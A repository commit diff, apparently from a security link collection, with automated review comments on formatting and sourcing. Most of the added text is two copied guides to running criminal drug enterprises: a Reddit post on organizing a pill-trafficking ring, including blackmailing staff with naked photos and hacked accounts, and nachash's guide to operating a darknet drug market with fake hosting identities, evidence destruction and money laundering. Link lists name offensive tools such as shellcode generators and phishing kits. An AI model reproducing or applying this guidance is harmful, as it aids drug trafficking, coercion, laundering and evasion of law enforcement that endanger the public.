@ -0,0 +1,12 @@ | |||
Completed Sections(Have gone through once, cleared most of cull) | |||
Sys internals |
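Review bot: "Completed Sections(Have gone through once, cleared most of cull)" needs a space before the opening parenthesis, and "cull" is left unexplained; say what was culled (duplicate, outdated or unsourced material) so the index is meaningful to other contributors, and make clear which file each listed section such as "Sys internals" corresponds to.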
@ -0,0 +1,62 @@ | |||
Alpraking's OPSEC guide to being a successful kingpin. | |||
submitted 5 hours ago * by AlpraKing | |||
For sale only $1999.97 unti..... | |||
pls UPVOTE cuz FREE. | |||
So you want to ship hundred of thousand of pills a week for years and stay safe? | |||
Here's a couple of tips to keep you safe. I've been here since SR 1.0 under various aliases and have, over the course of my-3 years online career , shipped over 10 million pills. I used to press pills myself. Now last time i've seen a press was a year ago. I'm basically just smoking bowls and trolling on reddit now. | |||
1. Outsource | |||
Outsourcing simply refers to the noble art of hiring other people, "pawns of the checker", to do the dirty work. You want to hire clean people that dont arise suspicions. They will be doing the dirty work so you want to hire someone who isn't already involved in drug trade or has priors. Don't get me wrong, you'll do everything in your power to protect them. Remember, if your guys catch heat, it can propagate to deeper layers fairly quickly and ultimately, to you. | |||
2. Separate Administration & Execution | |||
Have a layer of people who are doing the "boss" work and another one who is doing the "executive" work. Boss work is mainly paperwork and verifications to ensure everyone is doing his job properly and numbers balance and quality control is in check. Administrators dont get their hand dirty as that they will not handle the drugs themselves, but they will make sure packs are being shipped, tracking codes are being handled, productions are being made correctly and such. Administration is a promotion for executives who have shown a great degree of skill and loyalty. You can't put just anyone to overlook someone else's work. You have to get someone who has done it before and will be able to train new personnel or solve irregular issues. I normally promote my executors to administrators once they have shown that they can handle any issue from their business. I have them hire one of their friend and pay both from my own pocket. Employees kind of like hearing "hey, how about you keep your salary, train your friend to do your job, and you both will earn the same thing, paid from the big boss' pocket." More than money, people want power. Give power to people who want power and keep the money for yourself. | |||
3. Treat your employees well but do NOT overpay them. | |||
Treat your employees well by giving them insurances, paid vacations & trips, surprises bonuses, gifts and such. Do NOT give them a large payout even if they're pressing or shipping hundreds of thousands of pills. If someone becomes too comfortable with his pay, his quality of work will lower. you have to keep your employees dependant on you. Overpaying employees = Bad work. Double loss. For example in my own company all employees have a health insurance. they are allowed up to 1500/month in private medical, psychological bills paid by my expense) If not used, it will be given as a bonus vacation trip every couple months. Any lawyer time they might need for questions is also paid by the company. | |||
4. Don't hire people under 30 years old | |||
Both in the administrative and executive field. People under 30 years old are reckless, like to hang out in bars and brag to friends. People over 30 years old (get 40,50+ if you can) tend to be more straight with their shit. Much less likely to steal or botch the work and normally know the value of money. If you can get someone 40 yo+ that doesn't have a record, its most likely someone who already had a full-time job and knows how to work decently and not do dirty shit. Im 20 btw. | |||
5. Inform your people | |||
Tell them the truth. what they're risking, what to expect, have them meet your own loyal people who already been arrested for you and have them testify about the backup they had for not snitching. People will be much less likely to switch on you if you've told them exactly the truth. Don't go around with "There's no risk!" bullshit. Not only will your guys not believe you but they'll totally go nuts when they get arrested if you do. | |||
6. Back your own people | |||
Make sure all of your people are properly lawyered up. have them know by heart the name and phone number of their designated lawyer (under your control) and have them meet regularly, all expenses paid by you, in order to strengthen this trust between the lawyer and the employee. | |||
7. Don't hire people yourself | |||
People close to you, that you love and value, should not be getting their hands dirty on the long run. have them quit, or promote them quickly, if you have them on the field. As soon as they've mastered their work, have them hire their own friend to do your work, and pay both. | |||
8. Rotate your employees between jobs | |||
By rotating your employees between various work in your company you not only prevent heat from accumulating on one particular place or person, confusing investigations, but you're also contributing to their general training. this has various positive consequences; You are able to better target the quality and flaws of your various employees by having them try numerous different things. Also, if a branch of the operation is arrested, you can quickly reach out to your other personnel who has done similar work in the past to fill the voids. | |||
9. Have separate different secret workspots, and different labs. | |||
In order to confuse investigations, its mandatory to have different personnel, workspots, and labs. If i feel that heat is growing on one lab, I can quickly clean it up, have the worker stop and lay low for a while, and i simply transfer the workload over another less-heated up lab and production-guy. Its very difficult to see all the connections amongst various people especially when dealing with over 30 employees, but its needed. These connections are what will carry heat. I tend to think of it a bit like a computer would: | |||
10. Get it down to numbers. (TLDRs; skip this part) | |||
its hard to explain this part with words so I'll give an example with numbers. | |||
You suspect your packs are being profiled. If there is profiling going on, your courier is going to be considered the starting point of the heat. We will give it a 80% heat rating for this very event. Considering the courier access 3 times a week a stash, you will give the stash a 50% heat rating, just from this very link. the stash himself is linked to the lab, but only access it onces every 2 weeks. you will give your lab a 15% heat rating from this very event. Your treshold of risk is 70% (meaning you will shut down someone/somewhere that has over 70% heat rating), at this point you will shut down the courier and have him lay low, but the heat is not yet sufficient to close the stash and the lab, at 50% and 15% respectively | |||
Now a few days later you see a cop car parked on the street of your lab. This very event is worth 50% heat on your lab, and will also drip a 20% heat on your stash and 5% on your courier due to the links. | |||
Now shit got hot. Everything is above 70%. closing the entire branch. | |||
You'll admit it doesn't take math to notice that if your packs are being profiled AND a cop car is seen near your lab, you must be pretty hot as a whole and you SHOULD shut down. All I did was add numbers to follow the flow of heat and decide wisely what is hot and what is not. My objective is to keep all places around 30-40% heat which i consider a stable zone. If 60-70% is reached im going to start investigating very closely, but I will not close it down. If it busts 80% then its being closed down and laid low for a few weeks. Its not accurate because you have to estimate everything with little to no information, but it definitely helps seeing things and calculate your moves. If an event bust 150%, i will completely dismantle the place and move it to another spot. | |||
11. Trust buffers. | |||
Always have a layer of administration between you and your executives. You don't hire any executives, have your administrators do it. By doing so, NO ONE at risk of being busted knows who you are, let alone that you exist. If employees get caught and want to snitch, all they'll snitch is your administrator, who you should have sufficient trust in to believe he wont snitch you also. | |||
12. Family links between employees are powerful. | |||
If you testify in court, you don't get to choose who you snitch and who you don't (In Canada at least). You snitch everything or nothing. So it helps if employees get caught with members of their families, because they are much less likely to snitch as it would involve having them snitch on their own family. You can also use the trust between members of a single family to your advantage. You can normally trust your employee's brother or sister pretty much the same as you can trust your employee. assuming both work for you. | |||
13. Control the money | |||
Do not reveal how much you're making or how much people are making relative to one another. Its none of their business. I normally fund in cash one of my administrators with a lot of cash and he pays everyone by sending them cash in the mail, or bitcoins. He makes comptability records and bring them to me so i can see where the money went, before I handle more cash/btc to him. | |||
14. Encrypt everything | |||
Have your employees familiar with tails & tor+pgp communications. Anyone minially professional will take some notes. Make sure all your employees from the top to the bottom is familiar with TAILS and has a secure passphrase. Have them place all their documentation and notes there. Any paper hanging around must be burned. | |||
15. Avoid keeping illegal shit around the "dangerous hours". | |||
I refer to "Dangerous hours" as week-days 5AM to 8AM. My experience has shown me 90% of large drug raids occur during this time period. | |||
16. Not everyone has to know everyone. | |||
Its everyone's dream to think its like the movies where we gangsta organise "cartel parties" where everyone is invited. It doesn't work that way. If someone doesn't have to meet someone, don't make them meet. Don't take the risk of adding up more "heat rating" by creating un-necessary links between individuals who are not directly connected. | |||
17. Keep "jokers" | |||
Jokers are last-resort cards that allow you to solve dangerous issues or take-over control of your business in the event of catastrophic problems. Pictures of your employees naked, hacked passwords to their facebooks, knowing their addresses, etc. Anything you can use against them if shit goes wrong helps. | |||
18. Be diplomat when kicking people out | |||
Always be very diplomat when kicking people out. Give them a nice fat good-bye paycheck and specify you're giving them this paycheck to "forget everything". Keep good terms and explain your decisions with opsec and that you're doing this for their own protection. | |||
19. If your company screw up, pickup the pieces, dont flee. | |||
Believe me, its worth more in the long run if you admit to being busted/admit to problems, refund everyone, close shop for a few months, and come back, than it is to exit scam and start under a new name. It builds confidence in the long run. Its easy to be honest when your business goes well. But its in the bad moments that you show your true face. If you've been fucked in the past, been honest with everyone then came back, it gives an assurance that the same will happen if there's a fuckup in the future. How many vendors look so perfect until they start having issues? and when they do, most will run with customers money. If you are honest with customers despite problems, it will reward you later. It also helps looking at yourself in the mirror in the morning knowing you haven't fucked over a ton of people with less wealth than you. | |||
20. Always change | |||
Always change lab locations, stealth, rotate employees, open and closes front or laundering shops. Have several at the same time so you can switch work between places. Its like playing whack a mole with LE. If you stay too long in one single place, you'll get caught. I do not believe in "megalabs" with super OPSEC that are stable for years. A decentralised network of several small labs & dispatch places, constantly changing places, is the best. Its even better when you can afford to change places AND employee at the same time. Literally drops heat rating to 0% | |||
21. Make sure your team's opsec is always on point. | |||
Meet regularly with your administrators and have them tell you all the problems. Never get angry and don't judge them. They'll be much more open if they do not fear your reaction. Everyone can make mistakes. Your administrators should have the same attitude toward their employees. A transparent company allows you to see more problems and react accordingly. | |||
22. Don't flash | |||
Don't. Just don't. Fuck nice cars & nice houses as long as you are on the field or know directly people who work on the field. That will get you heated up more than anything else. Pile your money, hide it and work on laundering it with as much care and opsec as you do with your drugs. Fuel it in a legitimate business, with customers, then start laundering it slowly. Remember, as long as your money isn't properly laundered, its virtual. Anything you buy with it is a cursed gift that will increase your own heat and can also potentially be seized by LE. You can start flashing when all your work has been securely outsourced or when you retire. | |||
23. Dont get high on your own supply | |||
You should actually never even have your own supply in your house or somewhere that could be linked to you. It also impairs your judgement and can worsen paranoia, narcissism and other personality problems you tend to develop being in the drug business. Especially Xanax. Dont take Xanax and take important decisions; you will regret it. | |||
24. Prepare for an arrest | |||
Prepare yourself, psychologically and with your lawyer, your family, your administrators, in the event of a bust. Make sure you have cash readily accessible by your trusted people and have a plan. You won't be able to interact much with the outside world starting the very moment your door is rammed. And you won't be told when it would happen. Run "simulations" of a scenario where you and several of your administrators are arrested. Make sure someone can take your place or at least handle your personnal stuff, and get yourself a lawyer early on the payroll. Everytime you go to sleep in your bed, it might be the last night you get to pass there for a couple years. And everytime you peacefully wake up in the morning, congrats yourself that you have survived yet another day. | |||
The end | |||
Well not really, I wrote that nonstop just spewing out ideas. I think I could continue until 100. but my coke binge is over and i'm growing tired of writing. Good luck with your high-volume ambition, plebs. >:) | |||
TL;DR: https://anony.ws/image/JYCI | |||
P.S. Whoever is pressing fentanyl in xanax bars; Stop. Please. You're attracting LE attention on my game and making me lose sales due to everyone freaking the fuck out in the streets. And you're killing people. It's wrong. |
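Review bot: this file is a verbatim copy of a third-party Reddit post (credited to AlpraKing in the header) but carries no source URL, retrieval date or licence; add a provenance line at the top. Reddit interface residue such as "submitted 5 hours ago * by AlpraKing" and "pls UPVOTE cuz FREE." does not belong in a repository copy, and the "TL;DR" link to an anony.ws image is an external host unlikely to stay live, so describe its content or drop the link.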
@ -0,0 +1,329 @@ | |||
So, you want to be a darknet drug lord... | |||
by nachash | |||
nachash@observers.net | |||
[The advice in this article can be adapted to suit the needs of other | |||
hidden services, including ones which are legal in your jurisdiction. | |||
The threat model in mind is that of a drug market. The tone is that of a | |||
grandfather who is always annoyingly right, who can't help but give a | |||
stream-of-consciousness schooling to some whippersnapper about the way | |||
the world works. If this article inspires you to go on a crime spree and | |||
you get caught, don't come crying to me about it.] | |||
You've decided that you're bored with your cookie-cutter life of working | |||
at a no-name startup, getting paid in stock options and empty promises. | |||
You want a taste of the good life. Good for you, kid. I used to run a | |||
fairly popular hidden service (DOXBIN) that was seized by the FBI after | |||
3 1/2 years of spreading continuous butthurt, then subsequently | |||
repossessed from the feds. Because I managed to not get raided, I'm one | |||
of the few qualified to instruct others on hidden services and security, | |||
simply because I have more real-world experience operating hidden | |||
services than the average tor user. In other words, very little of this | |||
advice is of the armchair variety, as you'll often find in abundance the | |||
Internet. But enough about me. Let's talk about your future as an | |||
internet drug lord. | |||
1. Legal/Political | |||
First things first, you need to cover the legal, historical and | |||
political angles. Read up on various drug kingpins and cartels from the | |||
20th century. Learn everything you can about how they rose and fell ( | |||
you can safety ignore all the parts about intelligence agencies backing | |||
one drug cartel over another, because that's not going to happen to | |||
you). Once you've got a good command of that, read everything you can | |||
about busted drug market operators and branch out into cybercrime | |||
investigations as well. It wouldn't hurt to make yourself familiar with | |||
law enforcement and intelligence agency tactics either. You'll find that | |||
virtually all drug kingpins either get murdered or go to prison. Let | |||
those lessons sink in, then find a good drug lawyer and make plans for | |||
being able to pay them when The Man seizes everything you own. While | |||
you're dreaming big about making fat stacks of fake internet money, do | |||
some research on Mutual Legal Assistance Treaties and extradition treaties. | |||
Mutual Legal Assistance Treaties (MLATs) are self-explanatory. Country A | |||
will help Country B do whatever it takes to aid a cybercrime | |||
investigation should some aspect of the crime bleed over into Country A. | |||
Figure out which countries don't provide legal assistance to your | |||
country in these cases, then find hosting services that are based there. | |||
You'll shorten this list by determining which hosts allow tor, or at | |||
least don't explicitly forbid it in their Terms of Service (you don't | |||
care about exit bandwidth. You just want relays. Remember this for later | |||
in the article). Last but not least, sort out which hosts accept payment | |||
options that don't make you sweat bullets over the fact that the NSA has | |||
been monitoring global financial transactions since at least the 1970s. | |||
You will want to avoid any host that advertises itself as bulletproof -- | |||
they'll probably kit your box and siphon everything of value, in | |||
addition to overcharging you for the privilege of running on older | |||
hardware -- and any host which sells a cheap VPS and promises to | |||
guarantee your privacy. | |||
Extradition treaties mean that if you're in Country A and do something | |||
that makes Country B want to prosecute you, Country A is most likely | |||
going to give you a one way ticket to Country B. If or when your box | |||
gets seized and you know the heat is on, you're going to want to beat it | |||
to a place that won't send you back, where you will presumably live out | |||
the rest of your days. Just make sure you've made enough money to grease | |||
all the right palms in your new life, or the road ahead may be extremely | |||
bumpy. If you're smart, you'll permanently move to this country well | |||
before you have any trouble with law enforcement. | |||
One last thing before moving on: Don't be so stupid as to attempt to | |||
hire a hitman to kill anyone. Murder-related charges have no statute of | |||
limitations, which means you won't get to write a tell-all book about | |||
what a sly bastard you are when this wild ride is a distant memory. If | |||
you've reached a point in your new career where murdering people makes | |||
sense, it's time to walk away. Don't get corrupted like Dread Pirate | |||
Roberts. | |||
2. Technical | |||
This section tries to be as operating system independent as possible. | |||
You'll want to consult the documentation of your OS for specifics. The | |||
technical side of running a hidden service and not getting owned by cops | |||
is a lot harder than just installing stuff and crossing your fingers. | |||
The recommendations in this section WILL NOT protect you from 0days in | |||
the wild, but should help somewhat with damage control. Remember, if | |||
they want to own your hidden service, it will probably happen eventually. | |||
Before you even think about installing bitwasp and tor, you need to | |||
really understand how tor works. Go to freehaven.net and read the white | |||
papers until your eyes glaze over, then continue reading until you're | |||
out of papers to read. Pay particular attention to the hidden service | |||
papers. If you feel like you didn't understand something, come back to | |||
that paper again when you have more knowledge. A lot of the papers | |||
explain some of the same concepts with slight differences in the intros. | |||
Don't skim over them, because you might read someone's rewording that | |||
will clarify an idea for you. Check back with freehaven regularly. Once | |||
you're up to speed, a good next step is to keep up with the tor | |||
project's mailing lists. [1] | |||
While you're doing all of this reading, it's (mostly) safe to go ahead | |||
and install tor on a box on your local network, purely for | |||
experimentation. Keep in mind that the NSA will start scooping up all of | |||
your packets simply because you visited torproject.org. That means don't | |||
post code questions related your drug market on Stack Exchange, if you | |||
want to avoid giving The Man morsels he can use for parallel | |||
construction. Once you've gotten hidden services working for http and | |||
ssh, you're going to take the first baby step towards evading casual | |||
discovery: Bind your hidden services to localhost and restart them. | |||
The next step in your journey towards changing the drug business forever | |||
is to grab the transparent proxying firewall rules for your operating | |||
system to make sure they work. [2] They will guard against attacks that | |||
cause your box to send packets to a box the attacker controls, which is | |||
useful in thwarting attempts to get the box IP. You may wish to have a | |||
setup similar to an anonymous middle box, preferably without public IPs | |||
where possible, so if your application gets rooted tor isn't affected. | |||
Speaking of applications, do everything you can to ensure that the | |||
application code you use to power your hidden service isn't made of | |||
Swiss cheese and used bandaids. To protect against other types of | |||
attacks, you will want to identify any pre-compiled software that your | |||
users will touch and compile it yourself with hardening-wrapper or it's | |||
equivalent, plus any custom flags you want to use. If you keep | |||
vulnerabilities from the application and server to a minimum, your | |||
biggest worries will be tor-related. | |||
You will only connect to your production box via a hidden service. It's | |||
a good idea to get into that habit early. The only time deviating from | |||
this pattern is acceptable is when you have to upgrade tor, at which | |||
time you'll want to have a script ready that drops your firewall rules | |||
and unbinds ssh from localhost just long enough for you to login, do the | |||
upgrade, re-apply the firewall rules and bind ssh to localhost again. If | |||
you're not ready to deal with the latency, you're not ready to do any of | |||
this. Don't forget to transparently proxy the machine you use too, so | |||
you don't slip up by mistake. | |||
On the subject of the machine, you need to automate the process of both | |||
setting up your hidden service and of destroying it. Proactively change | |||
servers every few months, in order to frustrate law enforcement attempts | |||
to locate and seize your site. Your creation script should install | |||
everything your site needs as well as all configuration files. Your | |||
clean-up script needs to destroy all evidence, preferably with a tool | |||
like srm. | |||
Regarding time-related issues: Always select either UTC or a time zone | |||
that doesn't match the box's location. You will also do this to the box | |||
you use to interact with your hidden service every day. If you read the | |||
whitepapers, you will probably note a recurring theme of clock | |||
skew-related attacks, mostly directed at clients, in some of the older | |||
papers. Tor won't even start if the clock skew is off by too much. | |||
If you want to have some fun at the expense of business in the short | |||
term, intentionally take your service offline periodically in order to | |||
mess up attempts to match your downtime with public information. If | |||
you're the kind of person with access to botnets, you could DDoS | |||
(Distributed Denial of Service) some provider at the same time on the | |||
off chance that someone might connect the dots. This counter-measure | |||
will only work on researchers looking at public info, not nation state | |||
actors with an ax to grind. | |||
I've saved some of the hardest stuff for the last part of this section. | |||
It's hard because you have to make choices and it's unclear which of | |||
those choices are the best. It's a bit like a Choose Your Own Adventure | |||
book. In that spirit, all I can do is lay out the possibilities in as | |||
much of a Herodotus-like way as possible. | |||
One thing you have to consider is whether you want to run your hidden | |||
service as a relay or not. If it's a relay, you'll have extra cover | |||
traffic from other innocent tor users. But if your relay goes down at | |||
the same time as your hidden service, it will be far more likely to be | |||
noticed. Federal criminal complaints make a big deal of seized hidden | |||
services not being relays, but three relays were taken down at around | |||
the same time as Operation Onymous, so that's not a guaranteed defense. | |||
The choice is yours. | |||
Remember when I said to take note of hosts that don't ban tor outright? | |||
This is the part where you give back to the community in the form of tor | |||
relays or bridges. [3] The feel-good aspects of this move are along the | |||
same lines as drug barons who build schools and hospitals, but this is | |||
more immediately self-serving. You're going buy several servers to set | |||
up strictly as relays or bridges, then configure your hidden service box | |||
to use only those relays or bridges to enter the tor network. Here's | |||
where things start to get theoretical. | |||
If an adversary is running a guard node discovery attack -- in which an | |||
attacker is able to determine the node you're using to enter the tor | |||
network -- against your service and you're using your own relays as | |||
entry nodes, the damage they can do will be limited to DoS (Denial of | |||
Service) if your relays are not linkable to your identity. However, if | |||
you're entering the tor network with bridge nodes, an attacker will | |||
probably say "WTF?" at first unless they determine they've found a | |||
bridge node. Bridge nodes don't use nearly as much bandwidth as relays | |||
because there is not a public list of them, so an intelligence agency | |||
would have less traffic to sift through, which makes correlation easier. | |||
On the other hand, using bridge nodes also allows you to run obfsproxy | |||
[4] on both the bridges and your hidden service. obfsproxy allows you to | |||
make tor traffic appear to be another type of traffic, which is a good | |||
defense against non-Five Eyes entities. For example, your hosting | |||
provider may decide to monitor for tor traffic for their own reasons. | |||
Just make sure your relays/bridges aren't linkable to you or to each other. | |||
One last thing about guard node discovery attacks: The Naval Research | |||
Lab published a paper in July 2014 about the "Sniper Attack," [5] which | |||
in short works like this: The attacker discovers your guard nodes, then | |||
uses an amplified DoS trick to exhaust the memory on all of your nodes. | |||
The attacker keeps doing this until your hidden service uses guard nodes | |||
that they control. Then it's game over. If your hidden service's entry | |||
nodes are all specified in your torrc file and they get DoSed, your | |||
service will go offline. In this situation, if all of your relays are | |||
down, you essentially have an early warning canary that you're being | |||
targeted. In other words: This is the best possible time to book your | |||
one-way ticket to your chosen non-extradition country. For those of you | |||
with a background in writing exploits, this is similar in principle to | |||
how stack smashing protection will render some exploits either unable to | |||
function or will turn them into a DoS. Personally, I recommend an | |||
ever-changing list of relays or bridges. Add a few new ones at a | |||
pre-determined interval, and gradually let old ones go unpaid. | |||
3. Operational Security | |||
This section is critical, especially when things start to break down. If | |||
everything else goes bad, following this section closely or not could be | |||
the difference between freedom and imprisonment. | |||
This is important enough to re-state: Transparently proxy your tor | |||
computer. This is a good first line of defense, but it is far from the | |||
only way to protect yourself. | |||
Do not contaminate your regular identity with your Onion Land identity. | |||
You're an aspiring drug kingpin. Go out and pay cash for another | |||
computer. It doesn't have to be the best or most expensive, but it needs | |||
to be able to run Linux. For additional safety, don't lord over your new | |||
onion empire from your mother's basement, or any location normally | |||
associated with you. Leave your phone behind when you head out to manage | |||
your enterprise so you aren't tracked by cell towers. Last but not least | |||
for this paragraph, don't talk about the same subjects across identities | |||
and take counter-measures to alter your writing style. | |||
Don't log any communications, ever. If you get busted and have logs of | |||
conversations, the feds will use them to bust other people. Logs are for | |||
undercover cops and informants, and have no legitimate use for someone | |||
in your position. Keep it in your head or don't keep it at all. | |||
At some point, your enterprise is going to have to take on employees. | |||
Pulling a DPR move and demanding to see ID from high-volume sellers and | |||
employees will just make most people think you're a fed, which will | |||
leave your potential hiring pool full of dumbasses who haven't even | |||
tried to think any of this out. It will also make it easier for the feds | |||
to arrest your employees after they get done arresting you. If your | |||
enterprise is criminal in nature -- whether you're selling illegal goods | |||
and services or you're in a repressive country that likes to re-educate | |||
and/or kill dissidents -- an excellent way of flushing out cops is to | |||
force them to get their hands not just dirty, but filthy, as quickly as | |||
possible. Don't give them time to get authorization to commit a crime | |||
spree. If there's a significant amount of time between when they're | |||
given crimes to commit and the commission of those crimes, you need to | |||
assume you've got an undercover cop on your hands and disengage. If they | |||
commit the crime(s) more or less instantly, you should be fine unless | |||
you've got the next Master Splynter on your trail. [6] | |||
Disinformation is critical to your continued freedom. Give barium meat | |||
tests to your contacts liberally. [7] It doesn't matter if they realize | |||
they're being tested. Make sure that if you're caught making small talk, | |||
you inject false details about yourself and your life. You don't want to | |||
be like Ernest Lehmitz, a German spy during World War II who sent | |||
otherwise boring letters about himself containing hidden writing about | |||
ship movements. He got caught because the non-secret portion of his | |||
letters gave up various minor personal details the FBI correlated and | |||
used to find him after intercepting just 12 letters. Spreading | |||
disinformation about yourself takes time, but after a while the tapestry | |||
of deceptions will practically weave itself. | |||
Ensure that your communications and data are encrypted in transit and at | |||
rest whenever applicable. This means PGP for e-mail and OTR for instant | |||
messaging conversations. If you have to give data to someone, encrypt it | |||
first. For the tor-only box you use for interacting with your hidden | |||
service, full disk encryption is required. Make a password that's as | |||
long and complex as you can remember ("chippy1337" is not an example of | |||
a good password). Last but not least, when you're done using your | |||
dedicated tor computer, boot into memtest86+. Memtest86+ is a tool for | |||
checking RAM for errors, but in order to do that it has to write into | |||
each address. Doing so essentially erases the contents of the RAM. | |||
Turning your computer off isn't good enough. [8] If you're planning to | |||
use TAILS, it will scrub the RAM for you automatically when you shut | |||
down. Once your RAM is clean, remove the power cord and any batteries if | |||
you're feeling extra paranoid. The chips will eventually lose any | |||
information that is still stored in them, which includes your key. The | |||
feds can do a pre-dawn raid if they want, but if you follow this step | |||
and refuse to disclose your password, you'll make James Comey cry like a | |||
small child. | |||
Use fake info when signing up for hosting services. Obfuscate the money | |||
trail as much as possible and supply fake billing info. I prefer | |||
registering as criminals who are on the run, high government officials, | |||
or people I dislike. If your box gets seized and your hosting company | |||
coughs up the info, or if a hacking group steals your provider's | |||
customer database (It happens more often than you'd think), your hosting | |||
information needs to lead to a dead end. All signs in Operation Onymous | |||
point to operators being IDed because they used real info to register | |||
for hosting service and then their box got decloaked. | |||
Speaking of money, you're going to have to figure out how to launder | |||
your newfound assets, and we're not talking about using a couple bitcoin | |||
laundering services and calling it a day. You also shouldn't go out and | |||
buy a Tesla. Living beyond your means is a key red flag that triggers | |||
financial and fraud investigations. Remember, money is just another | |||
attack vector. Washing ill-gotten gains is a time-honored drug business | |||
tradition and one that you would be a fool not to engage in. You can | |||
only use your hard-won profits to send shitexpress.com packages to | |||
people you don't like so many times. | |||
Take-away: If you rely only on tor to protect yourself, you're going to | |||
get owned and people like me are going to laugh at you. Remember that | |||
someone out there is always watching, and know when to walk away. Do try | |||
to stay safe while breaking the law. In the words of Sam Spade, "Success | |||
to crime!" | |||
Sources: | |||
[1] https://lists.torproject.org/cgi-bin/mailman/listinfo | |||
[2] https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy | |||
[3] https://www.torproject.org/docs/bridges | |||
[4] https://www.torproject.org/projects/obfsproxy.html.en | |||
[5] | |||
http://www.nrl.navy.mil/itd/chacs/biblio/sniper-attack-anonymously-deanonymizing-and-disabling-tor-network | |||
[6] http://www.pcworld.com/article/158005/article.html | |||
[7] https://en.wikipedia.org/w/index.php?title=Canary_trap&oldid=624932671 | |||
[8] https://freedom-to-tinker.com/blog/felten/new-research-result-cold-boot-attacks-disk-encryption/ |
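Review bot: Reference [5] in the Sources list (the NRL sniper-attack paper) is split across two lines, with the bracketed label on one line and the URL on the next, so it does not read as a single entry like [1]-[4] and [6]-[8]; join it onto one line. Two claims in this section are stated without a source while everything around them is cited: the Operation Onymous attribution claim ("operators being IDed because they used real info to register for hosting service and then their box got decloaked") and the statement that TAILS scrubs RAM automatically on shutdown; either add them to the Sources list or mark them as the author's reading of events. The memtest86+ paragraph is consistent with its own citation [8] (the cold-boot research), but it says only that the chips "eventually" lose their contents; [8] is the source that actually measures how long data survives after power loss, so pointing the reader there explicitly would make the advice easier to evaluate.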
@ -0,0 +1,22 @@ | |||
#Car Hacking | |||
http://dn5.ljuska.org/cyber-attacks-on-vehicles-2.html | |||
https://github.com/manux81/canspy | |||
[Introduction to Hacking in Car Systems - Craig Smith - Troopers15](https://www.youtube.com/watch?v=WHDkf6kpE58) | |||
http://illmatics.com/Remote%20Car%20Hacking.pdf | |||
Yet Another Car Hacking Tool](https://asintsov.blogspot.ro/2016/03/yet-another-car-hacking-tool.html?m=1) | |||
[CANToolz](https://github.com/eik00d/CANToolz) | |||
* CANToolz is a framework for analysing CAN networks and devices. This tool based on different modules which can be assembled in pipe together and can be used by security researchers and automotive/OEM security testers for black-box analysis and etc. You can use this software for ECU discovery, MITM testing, fuzzing, bruteforcing, scanning or R&D testing and validation | |||
https://canb.us/ |
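Review bot: The "Yet Another Car Hacking Tool" entry is missing its opening "[", so it will render as literal text with a dangling ")" instead of a link, and the "#Car Hacking" heading needs a space after the "#" to render as a heading in GitHub-flavored markdown. The entries are also inconsistent in form: three are labeled markdown links (the Craig Smith Troopers15 talk, CANToolz, the asintsov post) while the rest (dn5.ljuska.org, canspy, the illmatics Remote Car Hacking PDF, canb.us) are bare URLs with no title, and only CANToolz gets a one-line description; give each entry a title and a short description so the list is usable without clicking through. The illmatics PDF is one of the URLs in the large file removed further down in this commit, so this is presumably where it was relocated; the other removed entries deserve the same check.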
@ -1,10 +0,0 @@ | |||
#Car Hacking | |||
[Introduction to Hacking in Car Systems - Craig Smith - Troopers15](https://www.youtube.com/watch?v=WHDkf6kpE58) |
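Review bot: The hunk header says ten lines were removed from this file but only the heading and the Craig Smith Troopers15 link are shown, and that link is re-added verbatim in the new Car Hacking file above, so this is a move rather than a deletion; the other eight removed lines are not visible on this page, so confirm they were carried across to the new file rather than dropped, and say so in the commit message.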
@ -1,9 +0,0 @@ | |||
https://sysforensics.org/2014/01/know-your-windows-processes.html | |||
[Mitigating Pass-the-Hash Attacks and other credential Theft-version2](http://download.microsoft.com/download/7/7/A/77ABC5BD-8320-41AF-863C-6ECFB10CB4B9/Mitigating-Pass-the-Hash-Attacks-and-Other-Credential-Theft-Version-2.pdf) | |||
* Official MS paper. | |||
[Preventing the Exploitation of Structured Exception Handler (SEH) Overwrites with SEHOP](http://blogs.technet.com/b/srd/archive/2009/02/02/preventing-the-exploitation-of-seh-overwrites-with-sehop.aspx) |
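Review bot: This deletion drops three defensive references that do not reappear in any file added in this commit: the sysforensics "know your Windows processes" post, the official Microsoft Pass-the-Hash mitigation paper (with its "* Official MS paper." annotation), and the SRD post on preventing SEH overwrite exploitation with SEHOP. The header says nine lines were removed but only four are shown, so the remainder cannot be checked here either. If these were relocated to a Windows or defense section, note that in the commit; if not, they are worth keeping, since the PtH paper and the SEHOP post are primary sources for mitigation guidance rather than link-dump filler.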
@ -1,289 +0,0 @@ | |||
Shellsploit let's you generate customized shellcodes, backdoors, injectors for various operating system. And let's you obfuscation every byte via encoders | |||
http://jakob.engbloms.se/archives/1554 | |||
https://conversations.im/omemo/ | |||
http://nsarchive.gwu.edu/cybervault/ | |||
Urge Everyone to watch: | |||
Hamming - You and your research | |||
https://www.youtube.com/watch?v=a1zDuOPkMSw | |||
https://www.sysmocom.de/news/sysmocom-publicly-releases-osmocom-user-manuals/ | |||
http://www.wxhexeditor.org/home.php | |||
https://www.fishnetsecurity.com/6labs/blog/post-exploitation-using-netntlm-downgrade-attacks | |||
http://wiki.osdev.org/Stack_Smashing_Protector | |||
http://mig.mozilla.org/ | |||
https://github.com/google/sanitizers | |||
Computer SCience from the Bottom Up | http://www.bottomupcs.com/ | |||
https://github.com/elceef/dnstwist | |||
https://github.com/strazzere/anti-emulator/blob/master/slides/Dex%20Education%20201%20-%20Anti-Emulation.pdf | |||
https://warroom.securestate.com/bmp-x86-polyglot/ | |||
https://github.com/httphacker/gethead/blob/gh-pages/gethead.py | |||
USBPcap | |||
http://www.scribd.com/doc/47334072/How-to-Steal-a-Nuclear-Warhead-Without-Voiding-Your-XBox-Warranty-paper | |||
https://github.com/strazzere/IDAnt-wanna | |||
https://github.com/codewatchorg/SideStep | |||
https://github.com/stamparm/maltrail | |||
Blogpost explaining above | |||
http://blog.rewolf.pl/blog/?p=573 | |||
http://illmatics.com/Remote%20Car%20Hacking.pdf | |||
http://toshellandback.com/2015/11/24/ms-priv-esc/ | |||
https://github.com/securestate/king-phisher | |||
https://github.com/SecurityInnovation/AuthMatrix | |||
https://fosdem.org/2016/schedule/event/radar/ | |||
https://getgophish.com/documentation/ | |||
http://www.programminghorizon.com/win32assembly/ | |||
http://x86asm.net/articles/introduction-to-uefi/ | |||
Linux kernel development | |||
https://github.com/0xAX/linux-insides/blob/master/Misc/contribute.md | |||
http://noxxi.de/research/http-evader-explained-6-whitespace.html | |||
http://meyerweb.com/eric/comment/chech.html | |||
| **Security | |||
www.cs.wm.edu/~hnw/paper/tdsc12b.pdf | |||
